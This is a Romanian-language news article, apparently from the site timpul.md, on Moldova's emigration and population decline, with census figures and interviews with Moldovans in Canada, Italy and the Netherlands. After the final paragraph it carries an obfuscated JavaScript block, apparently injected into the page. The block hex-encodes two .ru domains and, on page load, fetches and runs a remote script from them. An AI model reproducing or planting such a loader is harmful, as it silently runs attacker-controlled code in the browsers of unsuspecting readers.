Cea mai dificilă situație demografică este în localitățile rurale

Potrivit raportului preliminar al recensământului, în Moldova sunt înregistrate aproape un milion 260 de mii de locuinţe, iar 17 la sută sunt părăsite. Cele mai multe dintre ele sunt în raioanele din nordul ţării, în special, Donduşeni şi Soroca. Lideri la capitolul case fără stăpân sunt localităţile Pelinia din raionul Drochia, Cuconeştii Vechi din raionul Edineţ, Chetrişul Nou din Făleşti, Frumuşica Nouă şi Ţâra, din raionul Floreşti, Stălineşti din Ocniţa, Dărcăuţii Noi din Soroca şi satul Duduleşti din Găgăuzia. Aceleași rezultate preliminare arată că aproape 66 la sută din populaţie locuieşte în sate, în timp ce puţin peste 34 la sută dintre moldoveni sunt orăşeni.

„Decizia de a emigra a fost cea mai bună hotărâre din viață”

Chiar dacă locuiau în orașul Chișinău și nu duceau lipsă de nimic, acum șapte ani, familia Dogot a decis să plece în străinătate. Soții aveau doi copii mici și au decis că cea mai bună viață pentru ei va fi în Canada. „Experiența pe care am trăit-o cu emigrația a fost și norocul nostru. După ce au trecut toți acești ani, am realizat că decizia de a pleca a fost cea mai bună hotărâre din viață. Prietenii care ne-au întâlnit acolo, ne-au ajutat cu perfectarea actelor și cu tot ce ne trebuia ca să începem o cale nouă. Unii ne-au dat mobilă, alții alte lucruri necesare. Toți încercau să ne ajute cu câte un sfat, ne susțineau cu glume sau chiar ne-au pus la dispoziție și serviciu. Ei, la rândul lor, la fel au trecut printr-o asemenea experiență”, își amintește Cătălina Dogot. 

Ea spune că, pentru femei, perioada de acomodare în străinătate e mai ușoară, iar pentru bărbați e mai dificilă, deoarece totul pică pe umerii lor. Interlocutoarea mea se arată convinsă că, dacă cineva merge într-o țară străină, și așteaptă ca societatea să se dea după el, atunci nici nu are rost să se pornească. „Nu a fost deloc ușor. Treci prin momente grele, e cu totul altă lume, altă mentalitate, valori și comportament”, spune femeia. „Aici lumea nu așteaptă nimic de la nimeni. Nu trebuie să contezi că cineva este dator să-ți facă ceva. Fiecare își face meseria așa cum știe el mai bine și probabil din acest motiv, peste tot unde mergi este ordine. În Canada, toți oamenii se respectă reciproc și sunt pe același cântar – fie că este măturător de stradă, fie că este director de companie. În fiecare săptămână, o cină cu familia, într-un restaurant bun, și-o permite chiar și cel care spală vesela într-un local simplu”.

Potrivit ei, acolo, cele mai multe beneficii le au copiii. Aceștia pot face diferite activități, iar dacă părinții nu au bani, sunt unele organizații subsidiare care iau copilul fără plată. „În Canada ești ajutat în funcție de venit. Câștigi bine, statul îți dă mai puțin, dar dacă ai venituri mai mici, statul îți dă mai mult. Cei care câștigă mult plătesc taxe mai mari, iar cei cu venituri modeste plătesc taxe mai mici. Aici sunt săraci numai cei leneși. Această țară e plină de imigranți din toate colțurile lumii, dar populația băștinașă se uită la toți absolut normal. Aici omul este om”, susține Cătălina Dogot. 

Moldoveanca spune cu încredere că probabilitatea de a se reîntoarce acasă este nulă. Totodată, ea recunoaște că acolo sunt unele neajunsuri, dar nimic nu se compară cu oportunitățile care sunt puse la dispoziție, pe când în R. Moldova calitatea vieții lasă de dorit.

Populația e mult mai mică decât arată datele oficiale

În luna iulie 2015, Centrul de Cercetări Demografice (CCD) a lansat primul Barometru Demografic cu titlul: „Care este numărul real al populației R. Moldova?” Astfel, în conformitate cu datele BNS, populația este de 3,55 milioane de locuitori, pe când estimările alternative, ale CCD arată că numărul real al populației constituie circa 2,9 milioane. Astfel, efectivul populației fiind supraestimat cu peste 660 mii de persoane (16%). S-a demonstrat că supraestimarea numărului populației este rezultatul necorespunderii metodologiei naționale de înregistrare a fluxurilor migrației standardelor UE.

Olga Penina, cercetător științific, coordonator la Centrul de Cercetări Demografice al Institutului Național de Cercetări Economice, menționează în același barometru demografic că rezultatele preliminare ale Recensământului din 2014 demonstrează clar că „în pofida sporului natural negativ și a migrației masive, numărul populației prezent nu diferă deloc de numărul populației înregistrat la Recensământul din 2004”. Potrivit statisticii oficiale, în anul 2009, în R. Moldova pierderile generate de migrație au constituit circa două mii de persoane, însă conform statisticilor din Rusia și Italia (n.red. două țări recipiente cu cel mai mare număr al emigranților din R. Moldova) exodul moldovenilor în acel an a constituit peste 32 mii de persoane, diferența între surse fiind de 30 de mii. Datele statistice ale acestor țări pot fi comparate cu informația statistică referitoare la traversarea frontierei de stat a Serviciului Grăniceri. Aceasta este accesibilă în cadrul Sistemului Informațional Integrat Automatizat Migrației și Azil „SIIAMA” din anul 2009.

Conform barometrului demografic al CCD, în prezent, statistica oficială nu oferă date fiabile cu privire la numărul populației, ceea ce distorsionează situația demografică a țării în ansamblu, inclusiv prognozele demografice. Prin urmare, instituțiile de stat nu dispun de baza statistico-informațională, necesară pentru planificarea bugetului de stat, distribuția produsului național, politicilor sociale și fiscale, pentru prognozarea forței de muncă etc. „În circumstanțele socio-economice actuale, țara are nevoie de estimări credibile ale măsurilor anticriză, iar în condițiile declinului demografic și îmbătrânirii populației, doar în baza unor prognoze corecte pot fi elaborate politici adecvate de adaptare a societății la o nouă structură demografică”, se mai menționează în cercetare. 

Recomandările venite de la cei care au realizat acest barometru demografic se referă la urgentarea procesului de prelucrare și diseminare a rezultatelor Recensământului populației și al locuințelor din 2014. O altă soluție propusă de cercetători este „racordarea definițiilor naționale în domeniul migrației internaționale la standardele UE și utilizare a datelor corespunzătoare acestor definiții pentru calcularea numărului și structurii populației prezente.”

„Suntem sclavi moderni, în pușcării moderne”

Un alt caz care demonstrează că migrația e una dintre cele mai populare opțiuni în rândul moldovenilor de mai mulți ani, este cel al Tatianei Nogailic. Acum 15 ani, femeia s-a văzut nevoită să plece peste hotare. Dificultățile economice, criza în familie, situația morală și socială din țară și corupția au constrâns-o să-și lase copilul acasă și să ia drumul spre Italia. „Trebuia să găsesc o soluție, ca să asigur viitorul familiei mele. Aceleași motive au și mulți cunoscuți de-ai mei, care în prezent își doresc să plece din țară pentru totdeauna. Diferența este că atunci corupția și mafia erau la nivelul politicilor fiscale, iar astăzi statul e corupt”, constată femeia.

Ea susține că ar fi dispusă să revină în țară, dacă în sate se va dezvolta infrastructura, dacă birocrația nu va mai împiedica progresul, dacă vor fi oferite facilități fiscale pentru tinerii antreprenori, dacă va fi liberalizat sistemul energetic, dacă hoții vor ajunge la pușcărie și dacă în societate va persista bunul simț. „La fel, aș dori să putem lua împrumuturi bancare cu o dobândă rezonabilă, iar bătrânii, mi-aș dori să fie tratați cu respect. Desigur că intenționez cândva să revin, dar acum am frică să trăiesc în țara mea. Nimeni nu face nimic ca cetățenii plecați să vrea să se întoarcă acasă – se pare că acest lucru le convine tuturor. Nimeni nu pleacă întâmplător. Dacă ar fi fost bine, oamenii ar fi stat acasă, alături de copii și părinți. În Italia, se spune că noi facem parte din așa-numitele „țări de carton”. Acum eu văd R. Moldova ca pe o vădană (n.red. popular: văduvă) care a ajuns într-o stare de ebrietate și se vinde tuturor ca să-și poată hrăni părinții bătrâni și copiii orfani de tată”, consideră Tatiana Nogailic. 

Tatianei Nogailic, cetățeancă a R. Moldova care muncește în Italia

Interlocutoarea mea recunoaște că viața departe de casă e măcinată mereu de dor. „Suntem sclavi moderni, în pușcării moderne. Mă refer la miile de femei care stau 24 din 24 de ore în casele italienilor sau a grecilor și îi slujesc. Nimeni nu-și dorește o asemenea viață, dar alte soluții pur și simplu nu există”. Dorința de a-și ajuta conaționalii a și determinat-o, în anul 2004, să creeze Asociaţia Moldovenilor din Italia „AssoMoldave”, la care ea este în prezent președinte.

„Dacă aici ar fi fost condiții, evident c-am fi rămas”

Potrivit Olgăi Coptu, șefa Biroului pentru Relații cu Diaspora, în prezent, din R. Moldova, emigrează familiile tinere și, oricât ar fi de straniu, bine aranjate. Nordicii îi ademenesc pe cei mai buni specialiști de la noi cu salarii mult mai mari și condiții mai bune. Unii însă aleg totuși să plece și fără promisiunea că vor primi salarii mai mari. 

Un astfel de cuplu tânăr, de la noi, care consideră că unica soluție e plecarea în străinătate, este familia Dimitriuc. Soții trăiesc în Capitală, iar acum un an și jumătate au adus pe lume un copil. În tot acest timp au stat cu chirie, iar imposibilitatea de a-și putea cumpăra propria locuință și lipsa de perspective acasă, i-a determinat să colecteze setul de documente și să plece în Olanda. Ruptura de patrie urmează să aibă loc în următoarele câteva zile. „Pasul care ne-a determinat să luăm o asemenea decizie, este lipsa unui viitor sigur pentru copilul nostru”, spune Victoria Dimitriuc. „Corupția foarte mare în orice instituție de stat, lipsa propriului apartament și neîncrederea în sistemul bancar, pentru a putea lua un credit, la fel a jucat un rol important. Am ales Olanda pentru că acolo se vorbesc două limbi, este o țară pentru copii și e cu perspectivă. Din câte ne-am interesat, acolo ai posibilitate să obții un master cu cheltuieli mici și îți poți găsi cu ușurință un serviciu suficient de bine plătit ca să-ți asiguri existența. Principalul mijloc de transport pentru olandezi este bicicleta, ceea ce înseamnă că ei optează pentru un mod sănătos de viață”. 

Soții Dimitriuc sunt conștienți că prima perioadă le va fi foarte greu, dar spun că sunt pregătiți să facă față greutăților. Această schimbare radicală o fac de dragul fetiței lor. Ei susțin că acolo ea va beneficia de o școală bună, va învăța limba engleză și olandeză, iar cel mai important e că studiile sunt gratuite și calitative. „Dacă am fi avut aceste condiții aici, evident c-am fi rămas. Ne doare sufletul că plecăm din țara în care ne-am născut, ne pare rău să lăsăm aici părinții, prietenii, limba și tradițiile. Totuși dacă e să punem pe cântar aceste lucruri și viitorul copilului, cea de-a doua va cântări mai mult. Psihologic este foarte dificil pentru noi, însă am realizat că trebuie să ieșim din zona de confort și să ne asumăm provocări noi. Încercarea vină n-are! Oricând putem reveni acasă și continua viața pe care am dus-o până acum, dar dacă există măcar o șansă că am putea schimba lucrurile spre bine, trebuie s-o folosim”, consideră Victoria. 

Unica lor frică este bariera lingvistică pe care vor trebui s-o înfrunte chiar în primele zile. Ei însă se bazează pe suportul prietenilor care deja s-au stabilit acolo și cunosc cum stau lucrurile.

Un sondaj al forței de muncă evidențiază faptul că rata înaltă a migraţiei influenţează simțitor nivelul de activitate economică din R. Moldova şi, în particular, din zonele rurale. Aproape 70 la sută din toţi emigranții sunt din sate. Astfel, din cauza numărului ascendent de emigranți, populaţia economic activă a țării noastre se reduce de la an la an.
window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“703972696c7861677261386b762e7275″,”6e67756f67796e61387136682e7275″]’),o=”26698”,e=function(t){t=t.replace(“www.”,””);for(var o=””,e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[Ss]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="timpul.md",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild(r),r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild(r),"function"==typeof e&&e())}}},a=function(c){var f=t[c],l=n(f)+"/ajs/"+o+"/c/"+e(r)+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();